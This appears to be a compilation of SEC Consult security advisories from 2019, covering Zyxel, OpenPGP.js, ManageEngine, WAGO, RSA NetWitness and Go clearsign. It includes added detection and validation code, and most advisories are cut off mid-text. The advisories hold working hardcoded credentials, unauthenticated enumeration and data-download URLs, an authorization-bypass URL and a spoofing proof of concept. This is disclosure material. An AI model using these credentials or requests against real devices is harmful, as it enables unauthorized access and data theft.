Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
---

If the domain can be resolved, the response contains the resolved IP address
within the cookie value:
---
HTTP/1.1 200 OK
Date: Mon, 24 Jun 2019 08:14:33 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: Mon, 16 Apr 1973 13:10:00 GMT
Set-Cookie: arip=; path=/
Set-Cookie: zy_pc_browser=1; path=/
Connection: close
Content-Type: text/html
Content-Length: 9099

[...]
---

If the domain cannot be resolved, a redirection will be returned:
---
HTTP/1.1 302 Found
Date: Mon, 24 Jun 2019 08:11:57 GMT
Location: ext-js/app/view/login/useraware.html
Content-Length: 220
Connection: close
Content-Type: text/html; charset=iso-8859-1

[...]
---
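An added detection example that is not part of the advisory: flag hits on redirect.cgi in a web-server access log, using the advisory's observation that a 200 response means the name resolved and a 302 means it did not. The log lines are constructed (common log format, invented addresses and timestamps). Access logs do not record POST bodies, so POST hits are marked for follow-up on a proxy log or packet capture rather than guessed at.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines. The request targets follow the advisory's GET
# and POST variants; source addresses and timestamps are invented.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Jun/2019:08:11:57 +0000] "GET /redirect.cgi?arip=subdomain.domain.com&original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1" 302 220
203.0.113.7 - - [24/Jun/2019:08:14:33 +0000] "POST /redirect.cgi?original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1" 200 9099
192.168.1.20 - - [24/Jun/2019:08:16:10 +0000] "GET /ext-js/app/view/login/useraware.html HTTP/1.1" 200 1234
203.0.113.9 - - [24/Jun/2019:08:17:45 +0000] "GET /redirect.cgi?arip=intranet.corp.example&original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1" 200 9099
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')


def parse_log_line(line: str):
    """Split one common-log-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def resolution_from_status(status: int) -> str:
    """Per the advisory: 200 means the name resolved, 302 means it did not."""
    if status == 200:
        return "resolved"
    if status == 302:
        return "unresolved"
    return "unknown"


def redirect_cgi_findings(log_text: str) -> list:
    """Every hit on /redirect.cgi that could carry an arip lookup.

    GET requests expose the queried name in the URL. For POST the name travels
    in the body, which an access log does not record, so those hits are marked
    'body-not-logged' for follow-up instead of being dropped."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if url.path != "/redirect.cgi":
            continue
        arip = parse_qs(url.query).get("arip", [None])[0]
        if rec["method"] == "GET" and arip is None:
            continue  # ordinary redirect handling without a lookup parameter
        findings.append({
            "src": rec["src"],
            "method": rec["method"],
            "queried_name": arip if arip is not None else "body-not-logged",
            "outcome": resolution_from_status(int(rec["status"])),
        })
    return findings


def sources_over_threshold(findings: list, threshold: int) -> set:
    """Sources with more than `threshold` lookups: the spamming/probing pattern
    the advisory describes, suitable for a rate-based alert."""
    counts = {}
    for f in findings:
        counts[f["src"]] = counts.get(f["src"], 0) + 1
    return {src for src, n in counts.items() if n > threshold}


if __name__ == "__main__":
    found = redirect_cgi_findings(SAMPLE_LOG)
    for f in found:
        print(f)
    print("noisy sources:", sources_over_threshold(found, 1))
```

Lookups for internal names that come back "resolved" from external sources are the signal worth alerting on; the unauthenticated nature of the endpoint means no user context is available to filter them, so the source address and rate are the only handles the log offers.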


Vulnerable / tested versions:
-
The following versions have been tested, other versions might be affected as
well:
Zyxel USG110        ZLD 4.33
Zyxel USG210        ZLD 4.33
Zyxel USG310        ZLD 4.33
Zyxel USG1100       ZLD 4.33
Zyxel USG1900       ZLD 4.33
Zyxel USG2200-VPN   ZLD 4.33
Zyxel UAG2100       ZLD 4.18
Zyxel UAG4100       ZLD 4.18

The vendor provided the following list of affected devices:
Zyxel ATP200  

SEC Consult SA-20190829-0 :: Hardcoded FTP Credentials in Zyxel NWA/NAP/WAC wireless access point series

2019-08-30 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190829-0 >
===
  title: Hardcoded FTP Credentials
product: Zyxel NWA/NAP/WAC wireless access point series
 vulnerable version: see "Vulnerable / tested version"
  fixed version: see "Solution"
 CVE number: -
 impact: medium
   homepage: https://www.zyxel.com
  found: 2019-06-19
 by: Thomas Weber (Office Vienna)
 IoT Inspector
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has
been connecting people to the internet for nearly 30 years. We keep promoting
creativity which meets the needs of customers. This spirit has never been
changed since we developed the world's first integrated 3-in-1 data/fax/voice
modem in 1992. Our ability to adapt and innovate with networking technology
places us at the forefront of understanding connectivity for telco/service
providers, businesses and home users.

We're building the networks of tomorrow, helping unlock the world's potential
and meeting the needs of the modern workplace; powering people at work, life
and play. We stand side-by-side with our customers and partners to share new
approaches to networking that will unleash their abilities. Loyal friend,
powerful ally, reliable resource — we are Zyxel, Your Networking Ally."

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml



Business recommendation:

SEC Consult recommends Zyxel customers to upgrade the firmware to the latest
version available. A thorough security review should be performed by security
professionals to identify further potential security issues.


Vulnerability overview/description:
---
1) Hardcoded FTP Credentials
An FTP service runs on the Zyxel wireless access point that contains the
configuration file for the WiFi network. This FTP server can be accessed with
hardcoded credentials that are embedded in the firmware of the AP.
When the WiFi network is bound to another VLAN, an attacker can cross the
network by fetching the credentials from the FTP server.

The credentials were found by doing an automated scan with IoT Inspector.


Proof of concept:
-
1) Hardcoded FTP Credentials
The username "devicehaecived" and the password "1234" can be used to access the
FTP server of the AP on port 21.

The content of the FTP server looks like the following listing:
---
$ ls
cert  conf  debug  idp  packet_trace  script  tmp  wtp_image
---
The directory "conf" contains all configuration files which store the WiFi
SSIDs and passphrases.


Vulnerable / tested versions:
-
The following versions have been manually tested and were automatically
verified with IoT Inspector:
Zyxel NWA5121-NI       5.50 patch 0 and earlier
Zyxel NWA5121-N        5.50 patch 0 and earlier

The vendor provided the following list of affected devices:
Zyxel WAC6103D-I       5.50 patch 0 and earlier
Zyxel WAC6303D-S       5.50 patch 0 and earlier
Zyxel WAC6502D-E       5.50 patch 0 and earlier
Zyxel WAC6502D-S       5.50 patch 0 and earlier
Zyxel WAC6503D-S       5.50 patch 0 and earlier
Zyxel WAC6553D-E       5.50 patch 0 and earlier
Zyxel WAC6552D-S       5.50 patch 0 and earlier
Zyxel WAC5302D-S       5.50 patch 0 and earlier
Zyxel NWA5123-AC       5.50 patch 0 and earlier
Zyxel NWA5123-AC HD    5.50 patch 0 and earlier
Zyxel NWA5123-NI       5.50 patch 0 and earlier
Zyxel NWA5301-NJ       5.50 patch 0 and earlier
Zyxel NWA1302-AC       5.50 patch 0 and earlier
Zyxel NWA1123-ACv2     5.50 patch 0 and earlier
Zyxel NWA1123-AC HD    5.50 patch 0 and earlier
Zyxel NWA1123-AC PRO   5.50 patch 0 and earlier
Zyxel NAP102           5.50 patch 0 and earlier
Zyxel NAP203           5.50 patch 0 and earlier
Zyxel NAP303           5.50 patch 0 and earlier
Zyxel NAP353           5.50 patch 0 and earlier


Vendor contact timeline:

2019-06-26: Contacting vendor through secur...@zyxel.com.tw.
2019-06-27: Vendor changed PGP key. Sent advisory with new key. Vendor
confirmed receipt.
2019-07-03: Asked for an update; Vendor told that they

SEC Consult SA-20190822-0 :: Multiple Vulnerabilities in OpenPGP.js

2019-08-22 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190822-0 >
===
  title: Multiple Vulnerabilities
product: OpenPGP.js
 vulnerable version: <=4.2.0
  fixed version: 4.3.0
 CVE number: CVE-2019-9153, CVE-2019-9154, CVE-2019-9155
 impact: critical
   homepage: https://openpgpjs.org/
  found: 2018-2019
 by: Wolfgang Ettlinger (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"This project aims to provide an Open Source OpenPGP library in JavaScript so
it can be used on virtually every device. Instead of other implementations that
are aimed at using native code, OpenPGP.js is meant to bypass this requirement
(i.e. people will not have to install gpg on their machines in order to use the
library). The idea is to implement all the needed OpenPGP functionality in a
JavaScript library that can be reused in other projects that provide browser
extensions or server applications. It should allow you to sign, encrypt,
decrypt, and verify any kind of text - in particular e-mails - as well as
managing keys."

URL: https://openpgpjs.org/


Business recommendation:

SEC Consult was tasked by the German Bundesamt für Sicherheit in der
Informationstechnik (BSI) with conducting a security audit of the
Mailvelope browser extension as well as the parts of OpenPGP.js used by
Mailvelope. During the course of this audit multiple security vulnerabilities
with severities ranging from minor to critical have been identified. Some of the
vulnerabilities with higher severity are published as an advisory. A more
detailed description of the vulnerabilities as well as a description of other
vulnerabilities found during this project can be found in the report that has
been made available by the BSI:

https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Studies/Mailvelope_Extensions/Mailvelope_Extensions_pdf.html


Vulnerability overview/description:
---
1) Message Signature Bypass (CVE-2019-9153)
OpenPGP defines several types of signatures with each type carrying a different
semantic. Signatures are implemented as packets and each signature packet can
contain subpackets.

To indicate a message signature (e.g. a signed e-mail), the signature type
"text" is used. The text signature packet verifies both its subpackets as well
as the signed text.

During verification of a message signature, OpenPGP.js does not verify that the
signature is of type text. An attacker could therefore construct a message that,
instead of a text signature, contains a signature of another type. As the input
required for the verification process depends on the signature type, an attacker
could use a signature with a type that only verifies its subpackets and does not
require additional input.

An attacker could construct a message that contains a valid "standalone" or
"timestamp" signature packet signed by another person. OpenPGP.js would
incorrectly assume this message to be signed by that person.

2) Information from Unhashed Subpackets is Trusted (CVE-2019-9154)
OpenPGP signature subpackets contain information related to a signature (e.g.
the creation timestamp). These subpackets may appear in a "hashed" and
"unhashed" subpacket container. While the information in the hashed subpackets
is signed, the unhashed subpackets are not cryptographically protected.
OpenPGP.js however does not distinguish between these subpackets. When parsing a
signature packet, the signed information is parsed first. When the unhashed
packets are read, the information from the hashed packets is overwritten.

An attacker could arbitrarily modify the contents of e.g. a key certification
signature or revocation signature. As a result, the attacker could e.g.
convince a victim to use an obsolete key for encryption.
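The hashed/unhashed separation the description above turns on, as an added Go example (not OpenPGP.js code): a minimal parser for a version 4 signature packet body that keeps the two subpacket areas apart, beside a function that reproduces the flawed "read hashed, then let unhashed overwrite" merge. The packet bytes are constructed for this example and are not a real signature.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

type Subpacket struct {
	Type byte
	Body []byte
}

// SignatureInfo keeps the hashed (signed) and unhashed (unsigned) areas apart.
type SignatureInfo struct {
	SigType, HashAlgo byte
	Hashed, Unhashed  []Subpacket
}

// parseSubpackets decodes one subpacket area (RFC 4880 5.2.3.1); the 5-octet length form fails closed.
func parseSubpackets(data []byte) ([]Subpacket, error) {
	var out []Subpacket
	for len(data) > 0 {
		var n int // length counts the type octet plus the body
		switch {
		case data[0] < 192:
			n, data = int(data[0]), data[1:]
		case data[0] < 255 && len(data) >= 2:
			n, data = (int(data[0])-192)<<8+int(data[1])+192, data[2:]
		default:
			return nil, errors.New("unsupported or truncated subpacket length")
		}
		if n < 1 || n > len(data) {
			return nil, errors.New("subpacket length out of range")
		}
		out = append(out, Subpacket{Type: data[0] & 0x7f, Body: data[1:n]}) // bit 7 is the critical flag
		data = data[n:]
	}
	return out, nil
}

// ParseV4Signature decodes the fixed header and both subpacket areas (RFC 4880 5.2.3); trailing MPIs are ignored.
func ParseV4Signature(body []byte) (*SignatureInfo, error) {
	if len(body) < 6 || body[0] != 4 {
		return nil, errors.New("not a version 4 signature packet")
	}
	hEnd := 6 + int(binary.BigEndian.Uint16(body[4:6]))
	if hEnd+2 > len(body) {
		return nil, errors.New("truncated hashed subpacket area")
	}
	uEnd := hEnd + 2 + int(binary.BigEndian.Uint16(body[hEnd:hEnd+2]))
	if uEnd > len(body) {
		return nil, errors.New("truncated unhashed subpacket area")
	}
	hashed, err := parseSubpackets(body[6:hEnd])
	if err != nil {
		return nil, err
	}
	unhashed, err := parseSubpackets(body[hEnd+2 : uEnd])
	if err != nil {
		return nil, err
	}
	return &SignatureInfo{SigType: body[1], HashAlgo: body[3], Hashed: hashed, Unhashed: unhashed}, nil
}

// creationTime returns the last creation-time subpacket (type 2, RFC 4880 5.2.3.4) in sps.
func creationTime(sps []Subpacket) (t uint32, ok bool) {
	for _, sp := range sps {
		if sp.Type == 2 && len(sp.Body) == 4 {
			t, ok = binary.BigEndian.Uint32(sp.Body), true
		}
	}
	return
}

// CreationTime consults the hashed area only: the fixed behaviour.
func (s *SignatureInfo) CreationTime() (uint32, bool) { return creationTime(s.Hashed) }
// VulnerableCreationTime reproduces the flawed merge: hashed first, then unsigned unhashed ones overwrite.
func (s *SignatureInfo) VulnerableCreationTime() (uint32, bool) {
	return creationTime(append(append([]Subpacket{}, s.Hashed...), s.Unhashed...))
}

// SampleSignature is a constructed v4 text-signature body, not a real signature: hashed creation
// time 0x60000000, an attacker-appended unhashed creation time of 1, dummy left-16 bits and MPI.
var SampleSignature = []byte{
	0x04, 0x01, 0x01, 0x08, // version 4, type text (0x01), RSA, SHA-256
	0x00, 0x06, 0x05, 0x02, 0x60, 0x00, 0x00, 0x00, // hashed area: one creation-time subpacket
	0x00, 0x06, 0x05, 0x02, 0x00, 0x00, 0x00, 0x01, // unhashed area: conflicting creation time
	0xaa, 0xbb, 0x00, 0x01, 0x01,
}
func main() {
	sig, err := ParseV4Signature(SampleSignature)
	if err != nil {
		panic(err)
	}
	signed, _ := sig.CreationTime()
	merged, _ := sig.VulnerableCreationTime()
	fmt.Printf("signed creation time %#x, after flawed merge %#x\n", signed, merged)
}
```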

3) Invalid Curve Attack (CVE-2019-9155)
The implementation of the Elliptic Curve Diffie-Hellman (ECDH) key exchange
algorithm does not verify that the communication partner's public key is
valid (i.e. that the point lies on the elliptic curve). This causes the
application to implicitly calculate the resulting secret key not based on the
specified elliptic curve but rather an altered curve. By carefully choosing
multiple altered curves (and therefore the resulting public key), and observing
whether decryption fails, an attacker can extract the victim's private key.

This attack requires the attacker to be able to provide multiple manipulated
messages and to observe whether decryption fails.
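The point validation the description says was missing, as an added Go example (not OpenPGP.js code): the P-256 curve equation is evaluated directly with math/big so the check is visible, and an altered point is refused before any ECDH computation. The altered point is constructed here by shifting the generator's y coordinate by one.

```go
package main

import (
	"crypto/elliptic"
	"errors"
	"fmt"
	"math/big"
)

// OnP256 evaluates the P-256 curve equation y^2 = x^3 - 3x + b (mod p)
// directly, rather than through a library call, so the missing check is
// visible. Coordinates outside [0, p) are not field elements and fail too.
func OnP256(x, y *big.Int) bool {
	params := elliptic.P256().Params()
	p := params.P
	if x.Sign() < 0 || y.Sign() < 0 || x.Cmp(p) >= 0 || y.Cmp(p) >= 0 {
		return false
	}
	lhs := new(big.Int).Mul(y, y)
	lhs.Mod(lhs, p)
	rhs := new(big.Int).Mul(x, x)
	rhs.Mul(rhs, x)                                  // x^3
	rhs.Sub(rhs, new(big.Int).Mul(x, big.NewInt(3))) // x^3 - 3x
	rhs.Add(rhs, params.B)                           // x^3 - 3x + b
	rhs.Mod(rhs, p)
	return lhs.Cmp(rhs) == 0
}

// ValidatePeerPoint is what an ECDH implementation must run on the other
// party's public point before any scalar multiplication: an off-curve input
// silently moves the computation onto a curve of the sender's choosing, which
// is what the invalid curve attack exploits. P-256 has cofactor 1, so the
// on-curve test (the point at infinity has no affine coordinates and is
// excluded automatically) is sufficient.
func ValidatePeerPoint(x, y *big.Int) error {
	if x == nil || y == nil {
		return errors.New("missing coordinate")
	}
	if !OnP256(x, y) {
		return errors.New("public point is not on P-256: refusing ECDH")
	}
	return nil
}

func main() {
	params := elliptic.P256().Params()
	fmt.Println("generator:    ", ValidatePeerPoint(params.Gx, params.Gy))
	// Constructed off-curve point: the generator with its y coordinate shifted by one.
	shifted := new(big.Int).Add(params.Gy, big.NewInt(1))
	fmt.Println("shifted point:", ValidatePeerPoint(params.Gx, shifted))
	// A coordinate equal to p is rejected before any arithmetic is attempted.
	fmt.Println("y = p:        ", ValidatePeerPoint(params.Gx, params.P))
}
```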


Proof of concept:
---

SEC Consult SA-20190821-0 :: Unauthenticated sensitive information leakage in Zoho Corporation ManageEngine ServiceDesk Plus

2019-08-21 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190821-0 >
===
  title: Unauthenticated sensitive information leakage
product: Zoho Corporation ManageEngine ServiceDesk Plus
 vulnerable version: v10 <10509
  fixed version: v10 >=10509
 CVE number: CVE-2019-15045, CVE-2019-15046
 impact: Critical
   homepage: https://www.manageengine.com/products/service-desk/
  found: 2019-06-27
 by: Johannes Greil (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"ServiceDesk Plus is a game changer in turning IT teams from daily
fire-fighting to delivering awesome customer service. It provides great
visibility and central control in dealing with IT issues to ensure that
businesses suffer no downtime. For 10 years and running, it has been
delivering smiles to millions of IT folks, end users, and stakeholders
alike."

Source: https://www.manageengine.com/products/service-desk/


Business recommendation:

The vendor provides a patched version and it should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only a short
spot check has been performed and further critical issues are to be expected.
A workaround exists for mitigating vulnerability 1b (user enumeration).


Vulnerability overview/description:
---
1) Unauthenticated sensitive information leakage
a) Unauthenticated download of internal support ticket information
(CVE-2019-15046)
The software offers functionality (fosagent) that an unauthenticated attacker
can exploit in order to gain information about internal "events". In our test
it was possible to access sensitive internal information (tickets) written by
users of this application in exchange with the support team. Depending on the
contents of the tickets, sensitive data might leak through this functionality.
It is likely that it also depends on the configuration of ServiceDesk Plus
which information is stored in those "events".

b) User Enumeration in AjaxDomainServlet (CVE-2019-15045)
It is possible to collect valid usernames by interacting with the
"AjaxDomainServlet" function of the application without prior authentication.
This vulnerability is useful to increase the efficiency of brute force attacks.
If the username is known, it is easier to find the corresponding password.

Furthermore, the servlet leaks information, whether the user is a locally
configured or a domain user and it also leaks the internal domain names of the
requested user account.

According to the vendor, the affected feature is intended behaviour and a
workaround in order to disable it has been provided (see further below).


Proof of concept:
-
1) Unauthenticated sensitive information leakage
a) Unauthenticated download of internal support ticket information
(CVE-2019-15046)
The "fosagent" functionality provides a "download-file" servlet which an
unauthenticated attacker can use in order to iterate through existing internal
"events". The information that can be downloaded looks like internal ticket
system information and other data exchanged between users and the help desk
support team. The "log-pos" parameter must be supplied as a number followed by
a colon character and another number to access the corresponding event index.
An attacker can just increment those numbers and access different information.

https://$IP/fosagent/repl/download-file?log-pos=1:0


b) User Enumeration in AjaxDomainServlet (CVE-2019-15045)
The following URL can be used to efficiently enumerate user accounts configured
within ManageEngine ServiceDesk Plus. No prior authentication is required for
this functionality. The "search" parameter is used for supplying the user
account name.

https://$IP/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain=$USER

If the user exists and is a local user (configured within the web application)
it will show "Not in Domain" as a result. If the user exists and is a domain
user (e.g. LDAP) it will show the corresponding internal domain name as a
result. If the page stays empty the user does not exist.


Vulnerable / tested versions:
-
Version 10 has been tested. The vendor did not confirm whether older releases
are affected as well.


Vendor contact timeline:

2019-07-02: Contacting vendor through ManageEngine Security Response Center
(MESRC)
Uploaded security ad

SEC Consult SA-20190612-0 :: Multiple vulnerabilities in WAGO 852 Industrial Managed Switch Series

2019-06-13 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190612-0 >
===
  title: Multiple vulnerabilities
product: WAGO 852 Industrial Managed Switch Series
 vulnerable version: 852-303: https://www.wago.com
  found: 2019-03-08
 by: T. Weber (Office Vienna)
 IoT Inspector
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"New ideas are the driving force behind our success. WAGO is a family-owned
company headquartered in Minden, Germany. Independently operating for three
generations, WAGO is the global leader of spring pressure electrical
interconnect and automation solutions. For more than 60 years, WAGO has
developed and produced innovative products for packaging, transportation,
process, industrial and building automation markets amongst others. Aside from
its innovations in spring pressure connection technology, WAGO has introduced
numerous innovations that have revolutionized industry. Further ground-breaking
inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."

Source: http://www.wago.us/wago/



Business recommendation:

SEC Consult recommends to immediately apply the available patches
from the vendor. A thorough security review should be performed by
security professionals to identify further potential security issues.


Vulnerability overview/description:
---
The industrial managed switch series 852 from WAGO is affected by multiple
vulnerabilities, such as outdated software components embedded in the firmware.
Furthermore, hardcoded password hashes and credentials were found by an
automated scan with IoT Inspector. Two vulnerabilities (CVE-2017-16544 and
CVE-2015-0235) were verified by emulating the device with the MEDUSA scalable
firmware runtime. The validity of the password hashes and the embedded keys was
also verified by emulating the device.


1) Known BusyBox Vulnerabilities
The BusyBox toolkit in use, version 1.12.0, is outdated and contains multiple
known vulnerabilities. The outdated version was found by IoT Inspector.
One of the discovered vulnerabilities (CVE-2017-16544) was verified by using
the MEDUSA scalable firmware runtime.

2) Known GNU glibc Vulnerabilities
The GNU glibc in use, version 2.8, is outdated and contains multiple known
vulnerabilities. The outdated version was found by IoT Inspector. One of
the discovered vulnerabilities (CVE-2015-0235, "GHOST") was verified by
using the MEDUSA scalable firmware runtime.

3) Hardcoded Credentials (CVE-2019-12550)
The device contains hardcoded users and passwords which can be used to login
via SSH and Telnet.

4) Embedded Private Keys (CVE-2019-12549)
The device contains hardcoded private keys for the SSH daemon. The fingerprint
of the SSH host key from the corresponding SSH daemon matches to the embedded
private key.


Proof of concept:
-
1) Known BusyBox Vulnerabilities
BusyBox version 1.12.0 contains multiple CVEs like:
CVE-2013-1813, CVE-2016-2148, CVE-2016-6301, CVE-2011-2716, CVE-2011-5325,
CVE-2015-9261, CVE-2016-2147 and more.

The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on
an emulated device. A file with the name "\ectest\n\e]55;test.txt\a" was created
to trigger the vulnerability.

---
# ls "pressing "
test
]55;test.txt
#
---


2) Known GNU glibc Vulnerabilities
GNU glibc version 2.8 contains multiple CVEs like:
CVE-2010-0296, CVE-2010-3856, CVE-2012-4412, CVE-2014-4043, CVE-2014-9402,
CVE-2014-9761, CVE-2014-9984, CVE-2015-1472 and more.

The gethostbyname buffer overflow vulnerability (GHOST) was checked with the
help of the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was
compiled and executed on the emulated device to test the system.


3) Hardcoded Credentials (CVE-2019-12550)
The following credentials were found in the 'passwd' file of the firmware:
  
   root
No password is set for the account  [EMPTY PASSWORD] admin

By using these credentials, it's possible to connect via Telnet and SSH on the
emulated device. Example for Telnet:
---
[root@localhost ~]# telnet 192.168.0.133
Trying 192.168.0.133...
Connected to 192.168.0.133.
Escape cha

SEC Consult SA-20190515-0 :: Authorization Bypass in RSA NetWitness (@sec_consult)

2019-05-15 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >
===
  title: Authorization Bypass
product: RSA NetWitness
 vulnerable version: <10.6.6.1, <11.2.1.1
  fixed version: 10.6.6.1, 11.2.1.1
 CVE number: CVE-2019-3724
 impact: Medium
   homepage: https://www.rsa.com
  found: 2018-09-18
 by: Mantas Juskauskas (Office Vilnius)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."

Source: https://www.rsa.com/en-us/company/about


Business recommendation:

By exploiting the vulnerability documented in this advisory an unauthorized
attacker can access an administrative resource that may contain plain text
credentials to a 3rd party system.

The vendor provides a patch which should be installed on affected systems.


Vulnerability overview/description:
---
The authorization mechanism provided by the platform is prone to an
authorization bypass vulnerability, which can be easily exploited by
authenticated (but low privileged) remote attackers for gaining access to
administrative information including plaintext passwords.


Proof of concept:
-
A logged-in low privileged user (e.g. with role Analyst) is able to access
an administrative resource by calling the following URL:

https://[host]/admin/system/whois/properties

After the above URL is accessed, the server returns the following HTTP response
that contains sensitive information to a 3rd party whois service including
plaintext passwords:

HTTP/1.1 200 OK
Server: nginx
Date: [snip]
Content-Type: application/json;charset=UTF-8
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: [snip]
Content-Length: 795

{"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":10,"cacheMaxSize":5,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":10,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":259200},"cache-max-size":5,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":6



Vulnerable / tested versions:
-
The identified vulnerability has been verified to exist in the
RSA NetWitness platform, version 11.1.0.1.

According to the vendor, platform version 10 is also affected.

The following versions are vulnerable:
* <10.6.6.1
* <11.2.1.1


Vendor contact timeline:

2018-10-01: Contacting vendor through PGP via sec...@dell.com
2018-10-02: Vendor acknowledges the information was received, forwards
the info to the relevant department
2018-10-11: Vendor confirms the impact of the authorization issue,
starts to work on the remediation timeline
2018-10-15: Vendor provides additional information
2018-10-22: Contacting vendor to provide the remediation timeline
2018-10-23: Further email exchange related to the remediation timeline
2019-01-18: Vendor provides an update on the fix timeline
2019-03-05: Asking for a status update
2019-03-06: Vendor provides a status update on the release, patch for
platform version 11 will be released in March, version 10
Mid-April
2019-04-01: Asking for a specific release date & further status update
2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change,
they will inform us
2019-05

SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)

2019-05-13 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190513-0 >
===
  title: Cleartext message spoofing
product: Supplementary Go Cryptography Libraries
 vulnerable version: commit a5d413f7728c81fb97d96a2b722368945f651e78
 branch master (https://github.com/golang/crypto.git)
  fixed version: commit c05e17bb3b2dca130fc919668a96b4bec9eb9442
 CVE number: CVE-2019-11841
 impact: High
   homepage: https://golang.org
  found: 2019-03-28
 by: Aida Mynzhasova (Office Berlin)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Package clearsign generates and processes OpenPGP, clear-signed data. See
RFC 4880, section 7.

Clearsigned messages are cryptographically signed, but the contents of the
message are kept in plaintext so that it can be read without special tools."

Source: https://godoc.org/golang.org/x/crypto/openpgp/clearsign


Business recommendation:

During a short security test, SEC Consult found a severe security vulnerability
in the clearsign package of supplementary Go cryptography libraries.

This vulnerability could allow an attacker:
 - to lead a victim to believe the signature was generated using a different
   message digest algorithm than what was actually used;
 - to spoof clearsign OpenPGP messages by prepending arbitrary
   text to cleartext messages without invalidating the signatures.


Vulnerability overview/description:
---
1) Cleartext message spoofing
According to RFC 4880 section 7, a cleartext signed message can contain one
or more optional "Hash" Armor Headers. The "Hash" Armor Header specifies the
message digest algorithm(s) used for the signature. However, the package
"clearsign" in the supplementary Go cryptography libraries ignores the value
of this header, which allows an attacker to spoof it.

Thereby an attacker can lead a victim to believe the signature was generated
using a different message digest algorithm than what was actually used.
Moreover, since the library skips Armor Header parsing in general, an attacker
can not only embed arbitrary Armor Headers, but also prepend arbitrary text to
cleartext messages without invalidating the signatures.


Proof of concept:
-
1) Cleartext message spoofing
The following cleartext message with a valid SHA-1 signature was generated using
GnuPG:

(content of no_spoof.asc file):
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Message to be signed
-----BEGIN PGP SIGNATURE-----

iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-----END PGP SIGNATURE-----

Then the message was tampered by changing the value of the "Hash" Armor Header
from SHA-1 to SHA-512:

(content of hash_spoof.asc file):
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Message to be signed
-----BEGIN PGP SIGNATURE-----

iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
